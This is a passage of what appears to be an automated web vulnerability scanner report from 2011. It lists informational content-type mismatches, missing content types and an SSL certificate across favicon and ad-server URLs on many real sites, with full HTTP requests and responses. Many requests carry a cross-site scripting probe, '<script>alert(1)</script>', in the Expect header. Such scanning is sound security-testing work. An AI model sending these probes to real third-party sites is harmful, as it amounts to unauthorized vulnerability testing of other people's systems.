Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:07 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 14:44:43 GMT
ETag: "35c8f3c-57e-4944f50a28cc0"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................3...3...ff......3f.......f..33..3...3.f..ff..3f...3..f3..f3.f.3.......................................................................
...[SNIP]...
35.64. http://www.seoq.com/webstatshq/images/fav/g/o/o/19_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/g/o/o/19_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/g/o/o/19_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:14 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 17:03:02 GMT
ETag: "3610325-47e-494513f4b3d80"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................|...O...E...M...............Ix..4z..?|..@|..<{..Az.........._.......................|...........1v..;...?...>}..>z..Cy............
...[SNIP]...
35.65. http://www.seoq.com/webstatshq/images/fav/g/o/o/1_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/g/o/o/1_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/g/o/o/1_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:23:51 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 17:03:03 GMT
ETag: "3610326-47e-494513f5a7fc0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .................................|...O...E...M...............Ix..4z..?|..@|..<{..Az.........._.......................|...........1v..;...?...>}..>z..Cy............
...[SNIP]...
35.66. http://www.seoq.com/webstatshq/images/fav/r/i/v/647810_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/r/i/v/647810_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/r/i/v/647810_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:21:39 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 01:17:12 GMT
ETag: "3708812-1cbe-4945826925600"
Accept-Ranges: bytes
Content-Length: 7358
Content-Type: text/plain; charset=UTF-8

......00..............(...0...`.........................................................................................................................................................................
...[SNIP]...
35.67. http://www.seoq.com/webstatshq/images/fav/s/p/e/648999_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/s/p/e/648999_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/s/p/e/648999_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:24:50 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 02:49:51 GMT
ETag: "373898b-37e-4945971e9f1c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................3..3...z........................................3..3..3..3..V,..................................A..3..3..3..3..3..kF......................
...[SNIP]...
35.68. http://www.seoq.com/webstatshq/images/fav/y/a/h/3_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/images/fav/y/a/h/3_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /webstatshq/images/fav/y/a/h/3_favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:23:58 GMT
Server: Apache
Last-Modified: Sat, 06 Nov 2010 07:59:22 GMT
ETag: "37a898d-13e-4945dc4d4ea80"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...................................n.j...v...z......".......B...R...b...|................................................Q....`
......p.3...:...DJ...    `DDM....0DD.....:.I
...[SNIP]...
35.69. http://www.snapfinger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.snapfinger.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfinger.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.70. http://www.tacklewarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tacklewarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:24 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Fri, 09 Jul 2010 16:15:49 GMT
Content-Length: 82726
Content-Type: text/html

............ .h...F... .... .........00.... ..%..V......... .(....:..(....... ..... ...................................................................................................................
...[SNIP]...
35.71. http://www.tenniswarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tenniswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:18 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 02 Mar 2005 01:31:45 GMT
Content-Length: 1406
Content-Type: text/html

..............h.......(....... ...........@............................nL......................H*......de.......{..........0.......Y-..............{u..TC......C........|..h?.......h..{Z.......... ....
...[SNIP]...
35.72. http://www.termite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.termite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.termite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.73. http://www.trafficspaces.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trafficspaces.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficspaces.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF8A112B9F95B5CC3B2540868CFE0F67; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 00:53:40 GMT
Content-Length: 599

<!--TRAFFICSPACES_ERROR-->
<div class="content" style="margin-top: 20px">
   <div class="pagenotice">
       <!--<div id="rdcr">--><b class="rdcrtop"><b class="rdcr1"></b><b class="rdcr2"></b><b class="rd
...[SNIP]...
35.74. http://www.tubespecials.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tubespecials.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubespecials.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.75. http://www.wheelfire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wheelfire.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wheelfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.76. http://www.wyeke.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wyeke.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyeke.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
35.77. http://www.yoplait.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yoplait.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yoplait.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Mon, 02 May 2011 00:33:03 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
36. Content type is not specified  previous  next
There are 8 instances of this issue:

36.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:33:36 GMT
Pragma: no-cache
Content-Length: 5856
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
36.2. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:09:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:09:42 GMT
Pragma: no-cache
Content-Length: 4293
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
36.3. http://pcm2.map.pulsemgr.com/uds/pc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm2.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21273&sig=b2d480a4453ebdf16df158c05281fe0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pcm2.map.pulsemgr.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Mon, 02 May 2011 02:36:14 GMT

GIF89a.............!.......,...........D..;
36.4. http://www.bocajava.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bocajava.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bocajava.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"318-1280758987000"
Last-Modified: Mon, 02 Aug 2010 14:23:07 GMT
Content-Length: 318
Date: Mon, 02 May 2011 00:03:41 GMT
Connection: close
Set-Cookie: security=1bjb; path=/

..............(.......(....... ...............................................................www.fff.UUU.DDD.333."""...................................................................................
...[SNIP]...
36.5. http://www.lavalife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lavalife.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lavalife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
p3p: CP="CAO PSA OUR"
Accept-Ranges: bytes
ETag: W/"1150-1296589877000"
Last-Modified: Tue, 01 Feb 2011 19:51:17 GMT
Content-Length: 1150
Date: Sun, 01 May 2011 23:22:31 GMT
Age: 1364
X-Cache: HIT from www.lavalife.com
Connection: keep-alive

............ .h.......(....... ..... .................................................................................................................................................................B:
...[SNIP]...
36.6. http://www.ourprayer.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:41 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQ
...[SNIP]...
</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
...[SNIP]...
36.7. http://www.politicalissuestoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicalissuestoday.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.politicalissuestoday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
ETag: "AAAASkB3VeQ"
Last-Modified: Fri, 04 Jun 2010 07:29:30 GMT
Expires: Sun, 01 May 2011 23:46:24 GMT
Content-Length: 1406
Date: Sun, 01 May 2011 23:46:19 GMT

..............h.......(....... .......................................T0................................................................................................................................
...[SNIP]...
36.8. http://www.westjet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westjet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.westjet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4286
Last-Modified: Wed, 02 Feb 2011 21:44:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=59725
Expires: Mon, 02 May 2011 15:49:28 GMT
Date: Sun, 01 May 2011 23:14:03 GMT
Connection: close

...... .... .........(... ...@..... ...................................................................................................................................................................
...[SNIP]...
37. SSL certificate  previous
There are 2 instances of this issue:

37.1. https://www.crankyape.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.crankyape.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue May 04 16:42:31 CDT 2010
Valid to:  Wed Jul 06 14:55:48 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
